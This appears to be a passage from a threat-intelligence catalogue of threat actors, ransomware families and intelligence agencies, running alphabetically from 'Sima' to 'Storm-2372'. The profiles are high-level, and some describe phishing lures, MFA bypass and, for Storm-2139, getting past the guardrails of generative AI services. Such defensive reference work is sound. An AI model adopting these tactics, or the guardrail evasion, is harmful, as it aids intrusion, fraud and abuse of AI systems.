Sima is a group of suspected Iranian origin targeting Iranians in diaspora. In February 2016, Iran-focused individuals received messages purporting to be from Human Rights Watch's (HRW) Emergencies Director, requesting that they read an article about Iran pressing Afghan refugees to fight in Syria. While referencing a real report published by HRW, the links provided for the Director’s biography and article directed the recipient to malware hosted elsewhere. These spear-phishing attempts represent an evolution of Iranian actors based on their social engineering tactics and narrow targeting. Although the messages still had minor grammatical and stylistic errors that would be obvious to a native speaker, the actors demonstrated stronger English-language proficiency than past intrusion sets and a deeper investment in background research prior to the attempt. The actors appropriated a real identity that would be expected to professionally interact with the subject, then offered validation through links to their biography and social media, the former of which itself was malware as well. The bait documents contained a real article relevant to their interests and topic referenced, and the message attempted to address how it aligned with their professional research or field of employment. The referenced documents sent were malware binaries posing as legitimate files using the common right-to-left filenames tactic in order to conceal the actual file extension. All of these techniques, while common pretexting mechanisms, are a refinement compared to a tendency amongst other groups to simply continually send different forms of generic malware or phishing, in the hopes that one would eventually be successful.

Simple_Encoder

Ransomware

SINGING SPIDER

SINGING SPIDER is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

SingularityMD

SingularityMD is a threat actor group that has targeted educational institutions in the US. They gained unauthorized access to their networks by exploiting weak security practices, such as using students' dates of birth as passwords. SingularityMD demanded a ransom in cryptocurrency and threatened to leak stolen information if not paid. They have demonstrated a willingness to follow through on their threats and have already leaked some data.

Sinobi

Sinobi is an active extortion or ransomware group tracked by RansomLook.

SintaLocker

ransomware

Sixteenth Air Force

Sixteenth Air Force (16 AF)

SkidLocker

Ransomware Based on EDA2

SkidSec

SkidSec is a threat group that has engaged in operations targeting exposed printers in South Korea to disseminate North Korean propaganda, utilizing techniques such as printer exploitation and social engineering for evidence collection. The group has also experienced a leadership change following the loss of their leader, Govadmin, while continuing to mobilize their followers for various missions. They have humorously solicited financial support for their activities, framing it as a means to support their cause. Additionally, they have been noted for their potential to leak sensitive information from compromised devices.

Skira Team

Skira Team is an active extortion or ransomware group tracked by RansomLook.

Skull HT

ransomware

Skull

ransomware

SkyName Ransomware

It’s directed to Czechoslovakian-speaking users. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. Based on HiddenTear.

SkyStars

ransomware

Slam

Slam is an active extortion or ransomware group tracked by RansomLook.

SlankCryptor

ransomware

SLIME29

SLIME29 is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Slimhem Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is NOT spread using email spam, fake updates, attachments and so on. It simply places a decrypt file on your computer.

Slingshot

While analysing an incident which involved a suspected keylogger, we identified a malicious library able to interact with a virtual file system, which is usually the sign of an advanced APT actor. This turned out to be a malicious loader internally named ‘Slingshot’, part of a new, and highly sophisticated attack platform that rivals Project Sauron and Regin in complexity. While for most victims the infection vector for Slingshot remains unknown, we were able to find several cases where the attackers got access to MikroTik routers and placed a component downloaded by Winbox Loader, a management suite for MikroTik routers. In turn, this infected the administrator of the router. We believe this cluster of activity started in at least 2012 and was still active at the time of this analysis (February 2018).

SlopAds

SlopAds is a sophisticated ad fraud and click fraud operation involving a collection of 224 apps, downloaded over 38 million times globally. The threat actors utilize steganography, hidden WebViews, and a mobile marketing attribution platform to execute their fraud schemes, which include generating fraudulent ad impressions and clicks. Their infrastructure comprises multiple C2 servers and over 300 related domains, indicating plans for expansion. The operation has been linked to 2.3 billion bid requests per day, with significant traffic originating from the United States, India, and Brazil.

SloppyLemming

SloppyLemming is an advanced actor that uses multiple cloud service providers to facilitate different aspects of their activities, such as credential harvesting, malware delivery and command and control (C2). This actor conducts extensive operations targeting Pakistan, Sri Lanka, Bangladesh, and China. Industries targeted include government, law enforcement, energy, telecommunications, and technology entities.

Slovak Information Service

Slovak Information Service - Slovenská informačná služba (SIS)

Slovenska Obveščevalno-Varnostna Agencija

Slovenian Intelligence and Security Agency - Slovenska Obveščevalno-Varnostna Agencija (SOVA)

Slug

Slug is an active extortion or ransomware group tracked by RansomLook.

Smash!

Ransomware

Smaug

ransomware

Smishing Triad

The Smishing Triad is a Chinese-speaking threat group known for targeting postal services and their customers globally through smishing campaigns. They leverage compromised Apple iMessage accounts to send fraudulent messages warning of undeliverable packages, aiming to collect personally identifying information and payment credentials. The group offers smishing kits for sale on platforms like Telegram, enabling other cybercriminals to launch independent attacks. "Smishing Triad" has expanded its operations to target UAE citizens, using geo-filtering to focus on victims in the Emirates.

SMOKY SPIDER

Mentioned as operator of SmokeLoader in CrowdStrike's 2020 Report.

Smrss32

Ransomware

SmugX

The campaign, called SmugX, overlaps with previously reported activity by Chinese APT actors RedDelta and Mustang Panda. Although those two correlate to some extent with Camaro Dragon, there is insufficient evidence to link the SmugX campaign to the Camaro Dragon group. The campaign uses new delivery methods (most notably HTML Smuggling) to deploy a new variant of PlugX, an implant commonly associated with a wide variety of Chinese threat actors. Although the payload itself remains similar to the one found in older PlugX variants, its delivery methods result in low detection rates, which until recently helped the campaign fly under the radar.

Snake-Ekans

ransomware

Snake Ransomware

Snake ransomware first attracted the attention of malware analysts in January 2020 when they observed the crypto-malware family targeting entire corporate networks. Shortly after this discovery, the threat quieted down. It produced few new detected infections in the wild for the next few months. That was until May 4, when ID Ransomware registered a sudden spike in submissions for the ransomware.

Snake Wine

While investigating some of the smaller name servers that APT28/Sofacy routinely use to host their infrastructure, Cylance discovered another prolonged campaign that appeared to exclusively target Japanese companies and individuals that began around August 2016. The later registration style was eerily close to previously registered APT28 domains, however, the malware used in the attacks did not seem to line up at all. During the course of our investigation, JPCERT published this analysis of one of the group’s backdoors. Cylance tracks this threat group internally as ‘Snake Wine’. The Snake Wine group has proven to be highly adaptable and has continued to adopt new tactics in order to establish footholds inside victim environments. The exclusive interest in Japanese government, education, and commerce will likely continue into the future as the group is just starting to build and utilize their existing current attack infrastructure.

SnakeLocker

ransomware

Snatch

ransomware

SneakyChef

SneakyChef is a threat actor known for using the SugarGh0st RAT to target government agencies, research institutions, and organizations worldwide. They have been active since at least August 2023, with a focus on leveraging old and new command and control domains. The group has been observed using lures in the form of scanned documents related to Ministries of Foreign Affairs and embassies. Talos Intelligence assesses with medium confidence that the operators are likely Chinese-speaking based on language preferences and specific targets.

SNOWGLOBE

In 2014, researchers at Kaspersky Lab discovered and reported on three zero-days that were being used in cyberattacks in the wild. Two of these zero-day vulnerabilities are associated with an advanced threat actor we call Animal Farm. Over the past few years, Animal Farm has targeted a wide range of global organizations. The group has been active since at least 2009 and there are signs that earlier malware versions were developed as far back as 2007.

SnowPicnic

ransomware

SNSLocker

Ransomware Based on EDA2

SoFucked

ransomware

SOLAR SPIDER

SOLAR SPIDER’s phishing campaigns deliver the JSOutProx RAT to financial institutions across Africa, the Middle East, South Asia and Southeast Asia.

Soleenya

Soleenya is an active extortion or ransomware group tracked by RansomLook.

Solidbit

Ransomware, written in .NET.

Solider

ransomware

Solntsepek

Solntsepek is a threat actor group with ties to the Russian military unit GRU. They have claimed responsibility for a cyberattack on Kyivstar, a Ukrainian mobile operator, and have been linked to previous attacks on Ukrainian infrastructure. Solntsepek has been associated with the Sandworm hacking group, known for their destructive cyberattacks, including the NotPetya worm. They have also engaged in hostile activities, such as revealing personal details of Ukrainian soldiers.

SOLO

ransomware

Solve

ransomware

Somik1

ransomware

SongXY

SongXY is a Chinese APT group that employs phishing tactics to initiate cyberespionage campaigns. They utilize the Royal Road RTF builder, exploiting the CVE-2018-0798 vulnerability in Microsoft Equation Editor. In one instance, they sent a document containing a link to an attacker-controlled server, which automatically triggered upon opening, allowing them to gather information about the target's system configuration.

SOREBRECT

Fileless, Code-injecting Ransomware

Sorry HT

ransomware

Sous-direction anti-terroriste (SDAT)

Sous-direction anti-terroriste (SDAT)

South African National Defence Force Intelligence Division

South African National Defence Force, Intelligence Division (SANDF-ID)

Sp1d3r

Sp1d3r, a threat actor, has been involved in multiple data breaches targeting companies like Truist Bank, Cylance, and Advance Auto Parts. They have stolen and attempted to sell sensitive information, including customer and employee emails, account numbers, and source code. Sp1d3r has also claimed to have obtained data from a third-party platform and a cloud storage vendor. They have utilized hacking forums to sell the stolen data for significant sums of money.

Space Delta 18

Space Delta 18 (DEL 18)

SpaceBears

SpaceBears is a ransomware group believed to be based in Moscow, Russia, that has taken credit for several high-profile cyberattacks while primarily operating as a Data Broker. They currently list eight organizations on their Data Leak Site, focusing on medium to small-sized targets. Their methods suggest a reliance on basic extortion strategies rather than sophisticated malware tactics, with no advanced techniques or indicators of ransomware detected.

Spanish Armed Forces Intelligence Center

Armed Forces Intelligence Center (CIFAS)

SparklingGoblin

ESET researchers have discovered a new undocumented modular backdoor, SideWalk, being used by an APT group they’ve named SparklingGoblin; this backdoor was used during one of SparklingGoblin’s recent campaigns that targeted a computer retail company based in the USA. This backdoor shares multiple similarities with another backdoor used by the group: CROSSWALK.

Sparta

Sparta is an active extortion or ransomware group tracked by RansomLook.

SpartCrypt

ransomware

Special Branch (Bahamas)

Security and Intelligence Branch (SIB)

Special Branch, Bangladesh Police

Special Branch (SB)

Special Branch Bureau

Special Branch Bureau (SBB)

Special Branch (Pakistan)

Special Branch (Pakistan)

Special Branch (Sri Lanka)

Special Branch

Special Communications Service of Russia

Special Communications Service of Russia – Служба специальной связи и информации

Special Detective Unit

Special Detective Unit (SDU)

Special Intelligence Department

Special Intelligence Department (SID)

Special Security Force

Special Security Force – Intelligence Bureau (SSF-IB)

Spectre

ransomware

Sphinx

ransomware

SPICY PANDA

SPICY PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

SPIKEDWINE

SPIKEDWINE is a threat actor targeting European officials with a new backdoor called WINELOADER. They use a bait PDF document posing as an invitation letter from the Ambassador of India to lure diplomats. The attack is characterized by advanced tactics, techniques, and procedures in the malware and command and control infrastructure. The motivation behind the attacks seems to be exploiting the geopolitical relations between India and European nations.

Spirigatito

Spirigatito is an active extortion or ransomware group tracked by RansomLook.

Spiteful Doubletake

ransomware

SpongeBob

ransomware

Spook

Spook is an active extortion or ransomware group tracked by RansomLook.

Spora Ransomware

It’s directed to English-speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. Sample of a spam email with a viral attachment: https://4.bp.blogspot.com/-KkJXiHG80S0/WHX4TBpkamI/AAAAAAAADDg/F_bN796ndMYnzfUsgSWMXhRxFf3Ic-HtACLcB/s1600/spam-email.png

Sport

Ransomware

Spring

Spring is an active extortion or ransomware group tracked by RansomLook.

SQ_ Ransomware

It’s directed to English-speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. This hacker requests 4 bitcoins for ransom.

STAC5143

STAC5143 is a threat actor group tracked by Sophos, notable for its sophisticated use of Microsoft Office 365's legitimate services to conduct ransomware and data extortion campaigns. Unlike FIN7, which typically targets larger organizations through phishing and malicious Google Ads, STAC5143 focuses on smaller victims across diverse business sectors. Their operations begin with overwhelming targeted individuals with email bombing, followed by Microsoft Teams messages impersonating tech support to initiate a remote screen control session. Utilizing Microsoft's Quick Assist or direct Teams screen sharing, they deploy malware, including Java Archive (JAR) files and Python-based backdoors, from external SharePoint file stores. This cluster exploits legitimate services within the Microsoft Office 365 platform, using a Java-based proxy to execute PowerShell commands and download malicious payloads. While employing publicly available tools like RPivot, their obfuscation methods and the use of side-loaded DLLs for command and control, combined with the deployment of Black Basta ransomware in one instance, indicate a sophisticated and evolving threat actor adapting known techniques for their specific objectives.

StalinLocker

ransomware

Stampado

Ransomware coded by "The_Rainmaker". Randomly deletes a file every 6 hours, up to 96 hours, then deletes the decryption key.

STARDUST CHOLLIMA

Open-source reporting has claimed that the Hermes ransomware was developed by the North Korean group STARDUST CHOLLIMA (activities of which have been publicly reported as part of the “Lazarus Group”), because Hermes was executed on a host during the SWIFT compromise of FEIB in October 2017.

Stargazer Goblin

Stargazer Goblin is a threat actor group that operates the Stargazers Ghost Network on GitHub, distributing malware and malicious links through multiple accounts. They utilize compromised and created accounts to evade detection and quickly replace banned components to continue their operations. The group has been estimated to have earned approximately $100,000 from their malicious activities, offering a Distribution as a Service platform for other threat actors to distribute their malware. Stargazer Goblin has been involved in distributing various malware families, including Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine.

Starry Addax

Starry Addax is a threat actor targeting human rights activists associated with the Sahrawi Arab Democratic Republic using a novel mobile malware called FlexStarling. They conduct phishing attacks to trick targets into installing malicious Android applications and serve credential-harvesting pages to Windows-based targets. Their infrastructure targets both Windows and Android users, with the campaign starting with spear-phishing emails containing requests to install specific mobile apps or related themes. The campaign is in its early stages, with potential for additional malware variants and infrastructure development.

State Administration of Foreign Experts Affairs

State Administration of Foreign Experts Affairs (SAFEA)

State Agency for National Security

State Agency for National Security (Държавна агенция за национална сигурност (DANS)) – national security service under the supervision of the Council of Ministers of Bulgaria

State Authority for the Protection of the Constitution

Landesamt für Verfassungsschutz (LfV): (semi-independent) State Authority for the Protection of the Constitution for every single state

State Bureau of Investigation (Ukraine)

State Bureau of Investigation – Derzhavne Biuro Rozsliduvan (DBR)

State Committee for National Security (Kyrgyzstan)

State Committee for National Security (UKMK/GKNB)

State Committee for National Security (Tajikistan)

State Committee for National Security (SCNS) – Кумитаи давлатии амнияти милли (КДАМ)/Государственный комитет национальной безопасности (ГКНБ)

State Intelligence Agency (Indonesia)

State Intelligence Agency (BIN) – Badan Intelijen Negara

State Intelligence Service (Sri Lanka)

State Intelligence Service (Sri Lanka)

State Intelligence Services (the Gambia)

State Intelligence Services (the Gambia) (SIS)

State Security Agency (South Africa)

State Security Agency (SSA)

State Security and Intelligence Directorate

Direktion Staatsschutz und Nachrichtendienst (DSN): State Security and Intelligence Directorate

State Security Committee of the Republic of Belarus

State Security Committee of the Republic of Belarus (KDB/KGB) (State Security Committee)

State Security Department of Lithuania

State Security Department - (Valstybes saugumo departamentas (VSD))

State Security Service (Georgia)

State Security Service (SSSG) − სახელმწიფო უშიშროების სამსახური

State Security Service (Nigeria)

State Security Service (Internal Security)

State Security Service of the Republic of Azerbaijan

State Security Service (Dövlət Təhlükəsizliyi Xidməti)

State Security Service (Uzbekistan)

State Security Service - Davlat Xavfsizlik Xizmati (DXX)/ Служба государственной безопасности (СГБ)

Stealth Mango and Tangelo

This threat actor targets organizations in the satellite communications, telecommunications, geospatial-imaging, and defense sectors in the United States and Southeast Asia for espionage purposes.

Steel

ransomware

Stinger

ransomware

STOP Ransomware

Emmanuel_ADC-Soft found a new STOP Ransomware variant that appends the .INFOWAIT extension and drops a ransom note named !readme.txt.

StorageCrypt

Recently BleepingComputer has received a flurry of support requests for a new ransomware named StorageCrypt that is targeting NAS devices such as the Western Digital My Cloud. Victims have been reporting that their files have been encrypted and a note left with a ransom demand of between 0.4 and 2 bitcoins to get their files back. Users have also reported that each share on their NAS device contains an Autorun.inf file and a Windows executable named 美女与野兽.exe, which translates to Beauty and the Beast. From the samples BleepingComputer has received, this Autorun.inf is an attempt to spread the 美女与野兽.exe file to other computers that open the folders on the NAS devices.

StorageCrypter

Michael Gillespie noticed numerous submissions to ID Ransomware from South Korea for the StorageCrypter ransomware. This version is using a new ransom note named read_me_for_recover_your_files.txt.

Storm-0062

The cyberattack campaign that Microsoft uncovered was launched by a China-linked hacking group called Storm-0062. According to the company, the group is launching cyberattacks by exploiting a vulnerability in the Data Center and Server editions of Confluence. Those are versions of the application that companies run on-premises.

Storm-0249

Storm-0249 is an access broker active since 2021, known for distributing BazaLoader, IcedID, Bumblebee, and Emotet malware. The actor primarily employs phishing emails to deliver malware payloads, as evidenced by a campaign involving tax-themed emails that aimed to distribute BRc4 and Latrodectus malware. Storm-0249 has facilitated initial access for other threat actors, such as Storm-0501, by leveraging compromised credentials and exploiting known vulnerabilities in public-facing servers. Microsoft has detected malicious PDF attachments associated with Storm-0249's phishing campaigns.

Storm-0324

The threat actor that Microsoft tracks as Storm-0324 is a financially motivated group known to gain initial access using email-based initial infection vectors and then hand off access to compromised networks to other threat actors. These handoffs frequently lead to ransomware deployment.

Storm-0381

Storm-0381 is a threat actor identified by Microsoft as a Russian cybercrime group. They are known for their use of malvertising to deploy Magniber, a type of ransomware.

Storm-0473

Storm-0473 (Tomiris) is a threat actor that has been active since at least 2019. They primarily target government and diplomatic entities in the Commonwealth of Independent States region, with occasional victims in other regions being foreign representations of CIS countries. Tomiris uses a wide variety of malware implants, including downloaders, backdoors, and file stealers, developed in different programming languages. They employ various attack vectors such as spear-phishing, DNS hijacking, and exploitation of vulnerabilities. There are potential ties between Tomiris and Turla, but they are considered separate threat actors with distinct targeting and tradecraft by Kaspersky.

Storm-0494

Storm-0494 is a threat actor that facilitates Gootloader infections, which are then exploited by groups like Vice Society to deploy tools such as the Supper backdoor, AnyDesk, and MEGA. They utilize RDP for lateral movement and employ the WMI Provider Host to deploy the INC ransomware payload. Microsoft has identified their activities as part of a campaign targeting the U.S. health sector. Their operations are characterized by financially motivated tactics.

Storm-0506

Storm-0506 (DEV-0506) is a financially motivated cybercriminal group operating as a core affiliate within the Black Basta ransomware-as-a-service (RaaS) ecosystem, having switched from deploying Conti ransomware around April 2022. This actor's operational model is distinguished by its strategic reliance on a dynamic network of initial access brokers, showcasing a division of labor common in RaaS operations. Throughout its history, Storm-0506 has leveraged access obtained through various brokers: initially Storm-0450/0464 via Qakbot infections (pre-September 2023), then expanding to include Storm-1674 delivering DarkGate, Pikabot, and IcedID (September 2023), and later employing Storm-1674's Microsoft Teams vishing campaigns (October 2024) and Storm-0569's SEO poisoning leading to BATLOADER and Cobalt Strike (December 2023). Following successful initial compromise, Storm-0506 employs a range of post-exploitation tools, including Cobalt Strike Beacon, SystemBC, and Brute Ratel C4 backdoors, and notably, often utilizes command-and-control (C2) infrastructure established by Storm-0365, indicating close collaboration or shared resources. This actor is characterized by hands-on-keyboard activity, culminating in the deployment of Black Basta ransomware. A resurgence in activity observed in October 2024, directly linked to Storm-1674's vishing, underscores the ongoing and adaptive threat that Storm-0506 represents within the ransomware landscape.

Storm-0530

H0lyGh0st is a North Korean threat actor that has been active since June 2021. They are responsible for developing and deploying the H0lyGh0st ransomware, which targets small-to-medium businesses in various sectors. The group employs "double extortion" tactics, encrypting data and threatening to publish it if the ransom is not paid. There are connections between H0lyGh0st and the PLUTONIUM APT group, indicating a possible affiliation.

Storm-0539

Storm-0539 is a financially motivated threat actor that has been active since at least 2021. They primarily target retail organizations for gift card fraud and theft. Their tactics include phishing via emails or SMS to distribute malicious links that redirect users to phishing pages designed to steal credentials and session tokens. Once access is gained, Storm-0539 registers a device for secondary authentication prompts, bypassing multi-factor authentication and gaining persistence in the environment. They also collect emails, contact lists, and network configurations for further attacks against the same organizations.

Storm-0558

Storm-0558 is a China-based threat actor with espionage objectives. While there are some minimal overlaps with other Chinese groups such as Violet Typhoon (ZIRCONIUM, APT31), Microsoft maintains high confidence that Storm-0558 operates as its own distinct group.

STORM-0817

SweetSpecter is a suspected Iran-based actor that has gained notoriety for using publicly available artificial intelligence capabilities to develop its malware and tools.[[OpenAI CTI Update October 2024](/references/81f40284-12e5-4835-8c14-19fb894e4822)]

Storm-0826

Storm-0826 is a financially motivated cybercriminal group operating as an affiliate within the Black Basta ransomware-as-a-service (RaaS) ecosystem. This actor's primary known method of obtaining initial access is through handoffs from Storm-0464, a known distributor of the Qakbot malware.

Storm-0829

Nwgen is a group that focuses on data exfiltration and ransomware activities. They have been found to share techniques with other threat groups such as Karakurt, Lapsus$, and Yanluowang. Nwgen has been observed carrying out attacks and deploying ransomware, encrypting files and demanding a ransom of $150,000 in Monero cryptocurrency for the decryption software.

Storm-0835

Cybercriminals have launched a phishing campaign targeting senior executives in U.S. firms, using the EvilProxy phishing toolkit for credential harvesting and account takeover attacks. This campaign, initiated in July 2023, primarily targets sectors such as banking, financial services, insurance, property management, real estate, and manufacturing. The attackers exploit an open redirection vulnerability on the job search platform "indeed.com," redirecting victims to malicious phishing pages impersonating Microsoft. EvilProxy functions as a reverse proxy, intercepting credentials, two-factor authentication codes, and session cookies to hijack accounts. The threat actors, known as Storm-0835 by Microsoft, have hundreds of customers who pay monthly fees for their services, making attribution difficult. The attacks involve sending phishing emails with deceptive links to Indeed, redirecting victims to EvilProxy pages for credential harvesting.

Storm-0844

Storm-0844 is a threat actor originally known for distributing Akira ransomware, and more recently, for distributing Fog ransomware. The actor gains initial access likely by abusing valid accounts, then uses freely available tools for discovery, lateral movement, and exfiltration prior to ransomware deployment.[[Microsoft Threat Intelligence LinkedIn July 15 2024](/references/0e7ea8d0-bdb8-48a6-9718-703f64d16460)]

Storm-0867

Storm-0867 is a threat actor that has been active since 2012 and has targeted various industries and regions. They employ sophisticated phishing campaigns, utilizing social engineering techniques and a phishing as a service platform called Caffeine. Their attacks involve intercepting and manipulating communication between users and legitimate services, allowing them to steal passwords, hijack sign-in sessions, bypass multifactor authentication, and modify authentication methods.

Storm-0940

Storm-0940 is a Chinese threat actor active since at least 2021, known for gaining initial access through password spray and brute-force attacks, as well as exploiting network edge applications. Microsoft has observed Storm-0940 utilizing valid credentials obtained from CovertNetwork-1658's password spray operations, indicating a close operational relationship between the two. Once inside a victim environment, Storm-0940 has been seen leveraging compromised credentials for further malicious activities. Additionally, Storm-0940 has employed botnets, such as Quad7, to facilitate password spraying attacks.

Storm-1044

Storm-1044 has been identified as part of a cyber campaign in collaboration with Twisted Spider. They employ a strategic approach, targeting specific endpoints using an initial access trojan called DanaBot. Once they gain access, Storm-1044 initiates lateral movement through Remote Desktop Protocol sign-in attempts, passing control to Twisted Spider. Twisted Spider then compromises the endpoints by introducing the CACTUS ransomware. Microsoft has detected ongoing malvertising attacks involving Storm-1044, leading to the deployment of CACTUS ransomware.

Storm-1084

Storm-1084 is a threat actor that has been observed collaborating with the MuddyWater group. They have used the DarkBit persona to mask their involvement in targeted attacks. Storm-1084 has been linked to destructive actions, including the encryption of on-premise devices and deletion of cloud resources. They have been observed using tools such as Rport, Ligolo, and a customized PowerShell backdoor. The extent of their autonomy or collaboration with other Iranian threat actors is currently unclear.

Storm-1099

Storm-1099 is a sophisticated Russia-affiliated influence actor that has been conducting pro-Russia influence operations targeting international supporters of Ukraine since Spring 2022. They are known for their website forgery operation called "Doppelganger" and have been actively spreading false information. They have been involved in pushing the claim that Hamas acquired Ukrainian weapons for an attack on Israel. Storm-1099 has also been implicated in amplifying images of graffiti in Paris, suggesting possible Russian involvement and aligning with Russia's Active Measures playbook.

Storm-1101

DEV-1101 is a threat actor tracked by Microsoft who is responsible for developing and advertising phishing kits, specifically AiTM phishing kits. These kits are capable of bypassing multifactor authentication and are available for purchase or rent by other cybercriminals. DEV-1101 offers an open-source kit with various enhancements, such as mobile device management and CAPTCHA evasion. Their tool has been used in high-volume phishing campaigns by multiple actors, including DEV-0928, and is sold for $300 with VIP licenses available for $1,000.

Storm-1113

Storm-1113 is a threat actor that acts both as an access broker focused on malware distribution through search advertisements and as an “as-a-service” entity providing malicious installers and landing page frameworks. In Storm-1113 malware distribution campaigns, users are directed to landing pages mimicking well-known software that host installers, often MSI files, that lead to the installation of malicious payloads. Storm-1113 is also the developer of EugenLoader, a commodity malware first observed around November 2022.

Storm-1133

In early 2023, Microsoft observed a wave of activity from a Gaza-based group that it tracks as Storm-1133 targeting Israeli private sector energy, defense, and telecommunications organizations.

Storm-1152

Storm-1152, a cybercriminal group, was recently taken down by Microsoft for illegally reselling Outlook accounts. They operated by creating approximately 750 million fraudulent Microsoft accounts and earned millions of dollars in illicit revenue. Storm-1152 also offered CAPTCHA-solving services and was connected to ransomware and extortion groups. Microsoft obtained a court order to seize their infrastructure and domains, disrupting their operations.

Storm-1167

Storm-1167 is a threat actor tracked by Microsoft, known for their use of an AiTM phishing kit. They were responsible for launching an attack that led to Business Email Compromise activity.

Storm-1175

Storm-1175 is a cybercriminal group known for deploying Medusa ransomware and exploiting public-facing applications for initial access. They have been observed exploiting a critical deserialization vulnerability in GoAnywhere MFT, tracked as CVE-2025-10035, which could lead to command injection and potential RCE. Microsoft Defender researchers identified exploitation activity aligned with TTPs attributed to Storm-1175, including the use of post-compromise techniques that involve creating a group named “ESX Admins” in the domain.

Storm-1283

Storm-1283 is a threat actor that targeted Microsoft Azure cloud platform. They gained access to user accounts and created OAuth applications using stolen credentials, allowing them to control resources and deploy virtual machines for cryptomining. The targeted organizations incurred significant financial losses ranging from $10,000 to $1.5 million. Storm-1283 utilized compromised accounts and subscriptions to carry out their illicit activities.

Storm-1286

Storm-1286 is a threat actor that engages in large-scale spamming activities, primarily targeting user accounts without multifactor authentication enabled. They employ password spraying attacks to compromise these accounts and utilize legacy authentication protocols like IMAP and SMTP. In the past, they have attempted to compromise admin accounts and create new LOB applications with high administrative permissions to spread spam. Despite previous actions taken by Microsoft Threat Intelligence, Storm-1286 continues to explore new methods to establish a high-scale spamming platform within victim organizations using non-privileged users.

Storm-1295

Storm-1295 is a threat actor group that operates the Greatness phishing-as-a-service platform. They utilize synchronous relay servers to present targets with a replica of a sign-in page, resembling traditional phishing attacks. Their adversary-in-the-middle capability allows Storm-1295 to offer their services to other attackers. Active since mid-2022, Storm-1295 is tracked by Microsoft and is known for their involvement in the Greatness PhaaS platform.

Storm-1516

CopyCop is a Russian covert influence network that has established over 300 fictional media websites targeting the US, France, Canada, and other countries, primarily to disseminate pro-Russian and anti-Ukrainian narratives. The network employs TTPs such as deepfakes, fake interviews, and self-hosted LLMs for content generation, while also impersonating local media outlets and fact-checking organizations. Its operations are supported by the Moscow-based Center for Geopolitical Expertise and the GRU, aiming to undermine support for Ukraine and exacerbate political fragmentation in Western nations. CopyCop's influence content is amplified by a network of pro-Russian social media influencers and other Russian influence networks.

Storm-1567

Storm-1567 is the threat actor behind the Ransomware-as-a-Service Akira. They attacked Swedish organizations in March 2023. This ransomware utilizes the ChaCha encryption algorithm, PowerShell, and Windows Management Instrumentation (WMI). Microsoft's Defender for Endpoint successfully blocked a large-scale hacking campaign carried out by Storm-1567, highlighting the effectiveness of their security solution.

Storm-1575

Storm-1575 is a threat actor identified by Microsoft as being involved in phishing campaigns using the Dadsec platform. They utilize hundreds of domain generation algorithm (DGA) domains to host credential harvesting pages and target global organizations to steal Microsoft 365 credentials.

Storm-1674

Storm-1674 is an access broker known for using tools based on the publicly available TeamsPhisher tool to distribute DarkGate malware. Storm-1674 campaigns have typically relied on phishing lures sent over Teams with malicious attachments, such as ZIP files containing a LNK file that ultimately drops DarkGate and Pikabot. In September 2023, Microsoft observed handoffs from Storm-1674 to ransomware operators that have led to Black Basta ransomware deployment.

Storm-1679

Storm-1679 is a Russian disinformation group believed to be a spinoff of the Internet Research Agency, actively engaged in influence operations targeting the International Olympic Committee and the 2024 Olympic Games. The group has employed AI-generated content, including deepfake videos and fabricated narratives about violence, to discredit the IOC and instill fear among potential attendees. Their campaigns have been identified across multiple languages and platforms, utilizing techniques such as impersonation of media outlets and the creation of disinformation websites. Microsoft attributes significant disinformation activities related to the Olympics to Storm-1679, highlighting their focus on spreading falsehoods and promoting anti-Olympics messaging.

Storm-1747

Storm-1747 is an intrusion set that develops and operates the Tycoon 2FA phishing kit, which has been active since at least mid-2023 and is known for its sophisticated obfuscation and exfiltration techniques. The kit has been sold and distributed under the PhaaS model, making it one of the most widespread phishing kits by early 2025.

Storm-1811 (Deprecated)

*We are no longer maintaining this object in favor of a similar object subsequently published by MITRE: "Storm-1811" (Group). All relevant Tidal content extensions (e.g. additional Technique and Object relationships and metadata) have been added to the MITRE-authored object.* According to Microsoft security researchers, Storm-1811 is a "financially motivated cybercriminal group known to deploy Black Basta ransomware".[[Microsoft Security Blog 5 15 2024](/references/0876de6e-ea0c-4717-89a4-9c7baed53b6f)]

Storm-1849

UAT4356 is a state-sponsored threat actor that targeted government networks globally through a campaign named ArcaneDoor. They exploited two zero-day vulnerabilities in Cisco Adaptive Security Appliances to deploy custom malware implants called "Line Runner" and "Line Dancer." The actor demonstrated a deep understanding of Cisco systems, utilized anti-forensic measures, and took deliberate steps to evade detection. UAT4356's sophisticated attack chain allowed them to conduct malicious actions such as configuration modification, reconnaissance, network traffic capture/exfiltration, and potentially lateral movement on compromised devices.

Storm-1977

Storm-1977 is a sophisticated threat actor that conducts password-spraying attacks targeting cloud tenants, particularly in the education sector, utilizing the AzureChecker.exe CLI tool as their primary infection vector. They have successfully compromised over 200 containers, repurposing them for cryptocurrency mining operations by leveraging guest accounts to create new resource groups within compromised subscriptions. Microsoft Threat Intelligence researchers have identified unique operational patterns that distinguish Storm-1977 from other cryptomining threat actors. The group exploits compromised accounts as a primary attack surface in their operations.

Storm-1982

Microsoft threat actor profile. Origin/Threat: China.

Storm-2035

Microsoft threat actor profile. Origin/Threat: Iran, Influence operations.

Storm-2077

TAG-100 is a cyber-espionage APT that targets government and private sector organizations globally, exploiting vulnerabilities in internet-facing devices such as Citrix NetScaler and F5 BIG-IP for initial access. The group employs open-source tools like Pantegana and SparkRAT for persistence and post-exploitation activities, including credential theft and email data exfiltration. TAG-100 has compromised entities in at least ten countries, including two Asia-Pacific intergovernmental organizations, and focuses on sectors like education, finance, and local government. Their operations highlight the challenges of attribution due to the use of off-the-shelf tools and techniques that overlap with other state-sponsored groups.

Storm-2139

Storm-2139 is a cybercrime group that exploited stolen API keys from compromised Azure OpenAI Service accounts to generate harmful content, including non-consensual intimate imagery, using the DALL-E model. The group utilized reverse proxy infrastructure and custom software to bypass guardrails in Microsoft’s GenAI services. Microsoft has filed a lawsuit against four individuals associated with Storm-2139, alleging they modified customer systems and resold access to these capabilities. The group systematically harvested authentication tokens from U.S.-based enterprises and is linked to a broader network of illicit AI tool development and distribution.

Storm-2372

